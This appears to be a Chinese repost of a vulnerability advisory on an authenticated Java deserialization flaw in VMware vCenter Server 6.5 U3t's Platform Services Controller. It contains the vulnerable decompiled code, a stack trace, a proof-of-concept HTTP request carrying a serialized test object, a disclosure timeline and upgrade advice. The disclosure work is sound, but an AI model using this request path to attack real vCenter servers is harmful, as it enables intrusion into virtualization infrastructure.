0x01 概括
VMware vCenter Server 6.5 Update 3t 的 Platform Services Controller 功能中存在一个不安全的反序列化漏洞。特制的 HTTP 请求可能导致远程代码执行。攻击者可以发送 HTTP 请求来触发此漏洞。
0x02 确认的易受攻击的版本
以下版本经 Talos 测试或验证为易受攻击,或由供应商确认易受攻击。
VMware vCenter Server 6.5 更新 3t
0x03 产品网址
vCenter Server
https://www.vmware.com/products/vcenter-server.html
0x04 CVSSV3 分数
8.7 – CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
0x05 细节
VMware vCenter Server 是一个平台,可以集中控制和监控 vSphere 中包含的所有虚拟机和 EXSi 管理程序。
data
服务的处理程序中存在认证后 java 反序列化漏洞psc ( Platform Services Controller)
。让我们看一下代码中易受攻击的部分。深入到/psc/data/constraint/{constraintBlob}/*
处理程序的实现,我们可以看到以下代码:
getDataByConstraint
Line 1 ({"/constraint/{constraintBlob}"})
Line 2
Line 3 public Map<String, Object> getDataByConstraint( ("constraintBlob") String serializedConstraintObject, (value = "properties", required = false) String paramString2) throws Exception {
Line 4 if (StringUtil.isNullOrWhitespace(serializedConstraintObject))
Line 5 return null;
Line 6 Constraint constraint = CommonUtils.deserializeConstaintFromBase64Str(serializedConstraintObject);
(...)
Constraint
用户可以将附加 Base64 编码的序列化对象作为 url 的一部分传递给这个 servlet line 6
。查看实现,deserializeConstaintFromBase64Str
我们看到以下代码:
deserializeConstaintFromBase64Str
Line 41 public static Constraint deserializeConstaintFromBase64Str(String paramString) {
Line 42 Constraint constraint = null;
Line 43 byte[] arrayOfByte = Base64.decodeBase64(paramString);
Line 44 ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(arrayOfByte);
Line 45 try {
Line 46 JBossObjectInputStream jBossObjectInputStream = new JBossObjectInputStream(byteArrayInputStream);
Line 47 constraint = (Constraint)jBossObjectInputStream.readObject();
Line 48 StreamUtil.close((Closeable)jBossObjectInputStream);
Line 49 } catch (IOException iOException) {
Line 50 _logger.error("Was not able to create a JBossObjectInputStream");
Line 51 } catch (ClassNotFoundException classNotFoundException) {
Line 52 _logger.error("Was not able to deserialize Constraint object from JBossObjectInputStream");
Line 53 } finally {
Line 54 StreamUtil.close(byteArrayInputStream);
Line 55 }
Line 56 return constraint;
Line 57 }
如您所见,没有与反序列化对象相关的过滤lines 43-46
。开发人员根本不检查反序列化的对象类型,然后在line 47
. 我们可以通过序列化和发送(例如,一个名为Employee
. 在psc
日志中,我们可以观察到以下错误:
Employee :
at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1415)
at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1223)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:348)
at org.jboss.serial.io.JBossObjectInputStream.resolveClass(JBossObjectInputStream.java:141)
at org.jboss.serial.io.JBossObjectInputStream$1.resolveClass(JBossObjectInputStream.java:127)
at org.jboss.serial.classmetamodel.ClassMetamodelFactory.resolveClassByName(ClassMetamodelFactory.java:266)
at org.jboss.serial.classmetamodel.ClassMetamodelFactory.getClassMetaData(ClassMetamodelFactory.java:289)
at org.jboss.serial.classmetamodel.StreamingClass.readStream(StreamingClass.java:72)
at org.jboss.serial.objectmetamodel.ObjectDescriptorFactory.readObjectDescriptionFromStreaming(ObjectDescriptorFactory.java:381)
at org.jboss.serial.objectmetamodel.ObjectDescriptorFactory.objectFromDescription(ObjectDescriptorFactory.java:82)
at org.jboss.serial.objectmetamodel.DataContainer$DataContainerDirectInput.readObject(DataContainer.java:643)
at org.jboss.serial.io.JBossObjectInputStream.readObjectOverride(JBossObjectInputStream.java:163)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:492)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:459)
at com.vmware.vise.mvc.util.CommonUtils.deserializeConstaintFromBase64Str(CommonUtils.java:68)
at com.vmware.vise.mvc.controllers.DataAccessController.getDataByConstraint(DataAccessController.java:142)
(...)
这种数据反序列化的方法非常危险,可能允许攻击者执行任意命令。
0x06 利用概念证明
请求
GET /psc/data/constraint/amJzMXszAAAAATMAAAACAAAIRW1wbG95ZWUAASL6C7Hsp5eXAAKXEjO-44rgaCk1FZKH_mF7AQQAAAADAAAGTWFyY2luAAB6aQ HTTP/1.1
Host: 192.168.0.109
Cookie: JSESSIONID=D8E403940B6B595FF53158ED63671A69; XSRF-TOKEN=b28efbac-6d3c-4fcb-b177-baee9c1e005e; VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL; VSPHERE-CLIENT-SESSION-INDEX=_87577cc1f7ac5bba20fe8d947d9ffcfe
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/plain, */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Pragma: no-cache
Isangularrequest: true
X-Xsrf-Token: b28efbac-6d3c-4fcb-b177-baee9c1e005e
Referer: https://192.168.0.109/psc/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
0x07 时间线
2022-08-09 - 供应商披露
2022-10-06 - 供应商补丁发布
2022-10-10 - 公开发布
0x08 修复方案
升级 vCenter Server 到 6.5 U3u 或更高版本
如有侵权,请联系删除
好文推荐